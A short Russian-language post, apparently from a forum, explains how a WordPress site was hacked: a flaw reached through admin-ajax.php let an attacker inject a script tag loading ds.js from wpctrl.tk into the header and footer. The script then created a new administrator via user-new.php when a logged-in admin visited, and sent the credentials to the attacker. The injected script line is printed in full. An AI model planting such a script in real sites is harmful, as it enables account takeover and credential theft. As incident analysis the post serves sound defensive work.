Попытаюсь объяснить как произошёл взлом:
злоумышленник через admin-ajax.php воспользовался уязвимостью и внедрил код
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
в раздел header и footer, затем вы или другой администратор сайта зашёл на сайт залогиненым
в браузере сработал вредоносный код, который отправил запрос на /wp-admin/user-new.php на создание нового юзера, если это сделает любой другой человек - ничего не произойдёт, но если это сделает администратор, то новый пользователь будет создан!
затем скрипт отправил логин и пароль атакующему.